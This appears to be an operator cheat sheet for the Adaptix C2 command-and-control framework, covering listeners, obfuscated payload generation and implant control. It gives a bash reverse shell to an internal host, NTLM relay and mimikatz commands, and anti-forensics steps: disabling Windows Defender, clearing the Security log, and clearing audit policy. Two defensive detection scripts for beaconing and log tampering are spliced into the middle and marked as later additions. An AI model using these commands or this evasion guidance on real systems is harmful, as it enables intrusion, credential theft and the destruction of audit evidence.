Adaptix C2 is a modern, open-source command and control (C2) framework designed for red team operations and post-exploitation activities. It features a comprehensive web graphical user interface (GUI), sophisticated implant management capabilities, and built-in team collaboration tools. Adaptix is actively maintained and emphasizes modularity, extensibility, and operator ease-of-use. It supports multiple payload types, listener configurations, and advanced post-exploitation workflows.
# System requirements
- Linux (Ubuntu 20.04+ recommended)
- Docker and Docker Compose (optional but recommended)
- Python 3.9+
- Node.js 14+ for frontend
- PostgreSQL or SQLite for database
# Clone repository
git clone https://github.com/adaptix/c2.git
cd c2
# Install backend dependencies
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
# Install frontend dependencies
cd frontend
npm install
npm run build
cd ..
# Initialize database
python manage.py migrate
python manage.py createsuperuser
# Create required directories
mkdir -p logs uploads payloads listeners
chmod 700 logs uploads payloads listeners
# Clone repository
git clone https://github.com/adaptix/c2.git
cd c2
# Build Docker images
docker-compose build
# Start services
docker-compose up -d
# Initialize database
docker-compose exec web python manage.py migrate
docker-compose exec web python manage.py createsuperuser
# Access at https://localhost:8000
# Edit main configuration
cp .env.example .env
nano .env
# Critical settings:
SECRET_KEY=<generate-random-key>
DEBUG=false
ALLOWED_HOSTS=localhost,127.0.0.1,yourdomain.com
DATABASE_URL=postgresql://user:pass@db:5432/adaptix
REDIS_URL=redis://redis:6379/0
# Generate Django secret key
python -c "from django.core.management.utils import get_random_secret_key; print(get_random_secret_key())"
# Backend server
python manage.py runserver 0.0.0.0:8000
# Frontend development server (separate terminal)
cd frontend
npm start
# Access at http://localhost:3000
# Using Gunicorn
gunicorn --workers 4 --bind 0.0.0.0:8000 adaptix.wsgi:application
# Using Docker
docker-compose -f docker-compose.prod.yml up -d
# With SSL/TLS
# Configure reverse proxy (Nginx/Apache) with SSL certificates
# Create service file
sudo nano /etc/systemd/system/adaptix.service
[Unit]
Description=Adaptix C2 Framework
After=network.target
[Service]
User=adaptix
WorkingDirectory=/opt/adaptix
Environment="PATH=/opt/adaptix/venv/bin"
ExecStart=/opt/adaptix/venv/bin/gunicorn --workers 4 --bind 0.0.0.0:8000 adaptix.wsgi:application
Restart=always
[Install]
WantedBy=multi-user.target
# Enable service
sudo systemctl daemon-reload
sudo systemctl enable adaptix
sudo systemctl start adaptix
Dashboard
├── Home (Statistics, Recent Activity)
├── Listeners (Create, Manage Listeners)
├── Implants (View, Control Agents)
├── Payloads (Generate, Manage Payloads)
├── Tasks (Monitor, Manage Operations)
├── Users (Team Management)
├── Sessions (Active Connections)
└── Settings (Configuration)
Administrator - Full access, user/team management
Operator - Full C2 operations, team restricted
Viewer - Read-only access, monitoring only
Web UI Path: Listeners → New Listener
Name: HTTP-Listener-80
Type: HTTP
Protocol: HTTP
Host: 0.0.0.0
Port: 80
SSL/TLS: Disabled
Jitter: 5-15 seconds
Callback Path: /api/agent
Name: HTTPS-Listener-443
Type: HTTPS
Protocol: HTTPS
Host: 0.0.0.0
Port: 443
SSL/TLS: Enabled
Certificate: /path/to/certificate.crt
Private Key: /path/to/private.key
Jitter: 3-10 seconds
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Name: DNS-Listener
Type: DNS
Protocol: DNS
Domain: c2.example.com
DNS Server: 0.0.0.0
Port: 53
Record Type: A or TXT
TTL: 300
Jitter: 10-30 seconds
Name: SMB-Listener
Type: SMB
Protocol: SMB
Named Pipe: \\\\.\\pipe\\adaptix
Jitter: 5-15 seconds
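
Seen from the monitoring side, a listener with a fixed callback path and a bounded jitter range still produces request spacing far more regular than human browsing. The sketch below is an added example, not part of Adaptix or the original page; it flags such flows in proxy logs. The log layout, the source IPs, and the `min_requests` and `max_cv` thresholds are assumptions chosen for illustration.

```python
import statistics
from collections import defaultdict
from datetime import datetime, timedelta

def _lines(src, host, path, gaps, start="2024-01-01T09:00:00"):
    """Build constructed proxy-log lines: '<iso-ts> <src> GET <host> <path> 200'."""
    t = datetime.fromisoformat(start)
    out = [f"{t.isoformat()} {src} GET {host} {path} 200"]
    for g in gaps:
        t += timedelta(seconds=g)
        out.append(f"{t.isoformat()} {src} GET {host} {path} 200")
    return out

# Constructed sample data (not captured traffic).
SAMPLE_LOG = (
    _lines("10.0.5.23", "c2.example.com", "/api/agent", [7, 12, 5, 14, 9, 11, 6, 13])
    + _lines("10.0.5.40", "intranet.example.com", "/news", [1, 2, 240, 3, 1, 600, 2, 45])
    + _lines("10.0.5.41", "c2.example.com", "/api/agent", [8, 10])  # too few samples
)

def find_beacons(lines, min_requests=6, max_cv=0.5):
    """Return flows whose request spacing is regular enough to look automated.

    A flow is (source, host, path). Jitter widens the spread of intervals but
    keeps it bounded, so the coefficient of variation (stdev / mean) stays low
    compared with human browsing, which mixes bursts with long pauses.
    """
    flows = defaultdict(list)
    for line in lines:
        ts, src, _method, host, path, _status = line.split()
        flows[(src, host, path)].append(datetime.fromisoformat(ts))
    hits = []
    for key, stamps in flows.items():
        if len(stamps) < min_requests:
            continue  # not enough intervals to judge regularity
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")
        if cv <= max_cv:
            hits.append({"flow": key, "requests": len(stamps),
                         "median_gap_s": statistics.median(gaps), "cv": round(cv, 2)})
    return hits

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

Wider jitter ranges raise the coefficient of variation, so in practice the threshold is tuned against a baseline of known-good automated traffic such as update checks.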
Web UI Path: Payloads → New Payload
Payload Type: Windows EXE
Format: x86 or x64
Listener: HTTP-Listener-80
Obfuscation: Enabled
Proxy: None
Encoding: XOR Base64
Output Format: exe
Payload Type: PowerShell
Version: 2.0 or 5.0
Listener: HTTPS-Listener-443
Proxy: System Proxy
Encoding: Base64
Output: One-liner or Script
Payload Type: Python
Version: 3.6+
Listener: HTTP-Listener-80
Encoding: Base64
Output Format: .py or .pex
Payload Type: ELF
Architecture: x86 or x64
Listener: HTTP-Listener-80
Format: Shared Object or Executable
Encoding: Base64
Payload Type: Mach-O
Architecture: Universal or x86_64
Listener: HTTPS-Listener-443
Format: Executable or Dylib
Code Signing: Optional
Web UI Path: Implants → Active Agents
| Field | Description |
|---|---|
| Agent ID | Unique identifier for implant |
| Hostname | Compromised system name |
| Username | Logged-in user |
| IP Address | Internal/External IP |
| Process ID | Running process identifier |
| Architecture | x86 or x64 |
| OS Version | Operating system information |
| Last Checkin | Last communication timestamp |
| Status | Active, Inactive, or Dead |
Filter Options:
- Hostname: Contains "DC"
- OS: Windows, Linux, macOS
- Listener: HTTPS-Listener-443
- Status: Active only
- Username: Contains "admin"
- Last Checkin: Last 24 hours
Select Implant → Tasks → Shell
# Execute command
whoami
ipconfig
netstat -an
tasklist /v
Get-Process
Implant Menu → File Operations
| Operation | Description |
|---|---|
| `download /path/file.txt` | Download file from target |
| `upload ./payload.exe C:\Windows\Temp\` | Upload to target |
| `ls /home/user/` | List directory (Linux/macOS) |
| `dir C:\Users\` | List directory (Windows) |
| `mkdir /tmp/tools` | Create directory |
| `rm /tmp/file.txt` | Delete file (Linux/macOS) |
| `del C:\Temp\file.txt` | Delete file (Windows) |
Implant Menu → Process Management
# List processes
ps aux # Linux/macOS
Get-Process # PowerShell
# Kill process
kill 1234 # Linux/macOS
Stop-Process -Id 1234 # PowerShell
# Start process
./binary & # Linux/macOS background
Start-Process notepad.exe # PowerShell
Implant Menu → Privilege Escalation
# Check current privileges
whoami /groups # Windows
id # Linux/macOS
sudo -l # Check sudo permissions
# Execute as different user (Windows)
runas /user:DOMAIN\admin cmd.exe
# Kerberos ticket abuse (Windows)
mimikatz # kerberos::ask /target:user@domain
# Privilege escalation (Linux)
sudo -u root /bin/bash
Implant Menu → Lateral Movement
# Discover accessible hosts
nmap -p 3389,22,445 10.0.0.0/24
# Create reverse shell to another host
bash -i >& /dev/tcp/10.0.0.10/4444 0>&1
# SMB relay attack
responder -I eth0
ntlmrelayx.py -t 10.0.0.100 -c 'whoami'
# RDP pivot
xfreerdp /v:10.0.0.100 /u:admin /p:password
# SSH pivot
ssh -N -D 1080 user@10.0.0.100
proxychains nmap 10.0.0.200
Payloads → Generate Staged Payload
Stage 1: Lightweight stager
Stage 2: Full implant functionality
Stage 3: Post-exploitation modules
Proxy Type: HTTP, SOCKS4, SOCKS5
Address: proxy.internal.com
Port: 3128
Username: domain\user
Password: ****
Create staging listener on compromised system
Redirect traffic to internal C2 server
Isolate internal infrastructure from external exposure
| Module | Description |
|---|---|
| mimikatz | Windows credential extraction |
| bloodhound | Active Directory enumeration |
| powersploit | PowerShell post-exploitation |
| impacket | Network protocol tools |
| enum4linux | SMB enumeration |
| linpeas | Linux privilege escalation |
| winpeas | Windows privilege escalation |
| adexplorer | AD structure mapping |
| sharphound | Bloodhound collector |
| hashcat | Password cracking |
# Create module file
nano modules/custom_module.py
# Register module
python manage.py register_module modules/custom_module.py
# Deploy to implant
Implant → Load Module → custom_module
Settings → User Management
Create User:
Username: red_operator
Email: operator@example.com
Role: Operator
Teams: [Team Alpha, Team Bravo]
Assign Permissions:
- Create Listeners
- Generate Payloads
- Control Implants
- View Reports
Dashboard → Team Workspace
| Feature | Capability |
|---|---|
| Shared Listeners | Team-wide listener management |
| Shared Payloads | Payload library and distribution |
| Task Comments | Collaborative task documentation |
| Activity Log | Team operation timeline |
| Reports | Shared findings and results |
Implant → Notes
Enter operation notes visible to team members
Task → Comments
Add findings and instructions for team review
Settings → Logs → Activity Log
Filters:
- User: username
- Action: Login, Payload Generated, Task Executed
- Implant: agent_id
- Time Range: Custom dates
Implant → Logs
- Command execution history
- Output captured
- Errors and warnings
- Traffic analysis
Reports → New Report
Report Type: Executive Summary, Technical Analysis, Timeline
Date Range: Start to End
Implants: Selected agents
Include:
- Command execution summary
- File transfers
- Credentials harvested
- Network reconnaissance
- Privilege escalation timeline
# Obtain API token
curl -X POST https://c2.example.com/api/auth/token \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":"password"}'
# Response
{
"token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...",
"user_id": 1,
"username": "admin"
}
| Endpoint | Method | Description |
|---|---|---|
| `/api/v1/agents` | GET | List all agents |
| `/api/v1/agents/{id}` | GET | Get agent details |
| `/api/v1/tasks` | POST | Create task |
| `/api/v1/tasks/{id}` | GET | Get task status |
| `/api/v1/listeners` | GET | List listeners |
| `/api/v1/payloads` | POST | Generate payload |
| `/api/v1/sessions` | GET | List sessions |
# List all active implants
curl -H "Authorization: Bearer $TOKEN" \
"https://c2.example.com/api/v1/agents?status=active"
# Execute command on implant
curl -X POST https://c2.example.com/api/v1/tasks \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"agent_id": "abc123",
"command": "whoami",
"task_type": "shell"
}'
# Generate payload
curl -X POST https://c2.example.com/api/v1/payloads \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"payload_type": "windows_exe",
"listener_id": 1,
"obfuscation": true
}'
# adaptix/config/encoding.yaml
encoders:
xor:
key_size: 32
iterations: 3
base64:
iterations: 2
custom:
method: rc4
key_derivation: pbkdf2
# adaptix/config/profiles.yaml
profiles:
stealth:
jitter: 30-60
beacon_size: 512
user_agent: Mozilla/5.0 (Windows NT 10.0)
aggressive:
jitter: 1-5
beacon_size: 4096
user_agent: Custom/1.0
# Generate self-signed certificate
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365
# Import certificate to listener
Listeners → HTTPS-Listener → Upload Certificate
# Use Let's Encrypt (recommended for realism)
certbot certonly --standalone -d c2.example.com
| Issue | Solution |
|---|---|
| Implants not checking in | Verify listener is running, firewall rules, network connectivity |
| Database connection errors | Check DATABASE_URL, PostgreSQL running, credentials |
| SSL certificate errors | Regenerate certificate, verify domain, update listener config |
| API authentication fails | Check token expiry, regenerate token, verify permissions |
| Payload generation timeout | Increase timeout value, reduce obfuscation, check disk space |
# Enable debug logging
DEBUG=true python manage.py runserver
# Check logs
tail -f logs/adaptix.log
tail -f logs/web.log
# Database query logging
QUERY_LOG=true python manage.py runserver
# Test listener connectivity
nc -zv c2.example.com 80
nmap -p 443,80,53 c2.example.com
# Monitor implant traffic
tcpdump -i eth0 'port 80 or port 443'
wireshark
# Check firewall rules
sudo iptables -L -n
sudo ufw status
# Restrict web interface access
Configure reverse proxy IP whitelist
Implement VPN requirement
Enable two-factor authentication
Settings → Security → 2FA
- Use separate infrastructure for C2
- Implement domain fronting
- Vary beacon times and sizes
- Rotate listeners regularly
- Use different encoding per implant
- Monitor for blue team detection
- Clean logs regularly
# Disable Windows Defender
powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
# Disable logging
wevtutil cl Security
auditpol /clear /y
# Alternative: disable via Group Policy
gpedit.msc → Computer Configuration → Administrative Templates
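
The three tampering commands above each leave a process-creation record, and each has a Windows event that should corroborate it. The following is an added detection sketch, not code from the original page or from Adaptix; the record shape, host names, and user names are constructed for illustration.

```python
import re

# (rule name, ATT&CK technique, event that should corroborate it, command-line pattern)
RULES = [
    # PowerShell accepts abbreviated parameter names and ':' separators.
    ("defender_realtime_off", "T1562.001", "Defender/Operational 5001",
     re.compile(r'set-mppreference\b.*-disablerea\w*[\s:]+(\$true|true|1)\b', re.I)),
    ("security_log_cleared", "T1070.001", "Security 1102",
     re.compile(r'\bwevtutil(\.exe)?"?\s+(cl|clear-log)\s+"?security\b', re.I)),
    ("audit_policy_cleared", "T1562.002", "Security 4719",
     re.compile(r'\bauditpol(\.exe)?"?\s+/clear\b', re.I)),
]

# Constructed process-creation records (shape of Security 4688 / Sysmon 1 data).
SAMPLE_EVENTS = [
    {"host": "WS-014", "user": "CORP\\jdoe",
     "cmdline": 'powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"host": "WS-014", "user": "CORP\\jdoe", "cmdline": "wevtutil cl Security"},
    {"host": "WS-014", "user": "CORP\\jdoe", "cmdline": "auditpol /clear /y"},
    # Benign look-alikes that must not alert.
    {"host": "WS-020", "user": "CORP\\helpdesk",
     "cmdline": "powershell Set-MpPreference -DisableRealtimeMonitoring $false"},
    {"host": "WS-020", "user": "CORP\\helpdesk", "cmdline": "wevtutil qe Security /c:5"},
    {"host": "SRV-02", "user": "CORP\\auditor", "cmdline": "auditpol /get /category:*"},
]

def detect(events):
    """Return one alert per (event, rule) match on the command line."""
    alerts = []
    for ev in events:
        for name, technique, corroborate, pattern in RULES:
            if pattern.search(ev["cmdline"]):
                alerts.append({"host": ev["host"], "user": ev["user"], "rule": name,
                               "technique": technique, "corroborate_with": corroborate})
    return alerts

def hosts_with_chain(alerts, min_rules=2):
    """Hosts where several distinct tamper rules fired: a higher-confidence signal."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["host"], set()).add(a["rule"])
    return sorted(h for h, rules in seen.items() if len(rules) >= min_rules)

if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    print(found, hosts_with_chain(found))
```

Because clearing the Security log removes earlier records on the host, these rules are only reliable when process-creation events are forwarded off the endpoint as they occur.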
- Always maintain operational security
- Document all activities with timestamps
- Test payloads in isolated lab environment
- Rotate indicators of compromise (IOCs)
- Plan exit strategy before engagement
- Monitor blue team defensive actions
- Maintain multiple listener types
- Regular backup of database and configurations
# Backup critical data
tar -czf backup_$(date +%Y%m%d).tar.gz \
/opt/adaptix/db /opt/adaptix/payloads /opt/adaptix/logs
# Archive evidence
mkdir -p /evidence/$(date +%Y%m%d)
cp -r /opt/adaptix/logs /evidence/$(date +%Y%m%d)/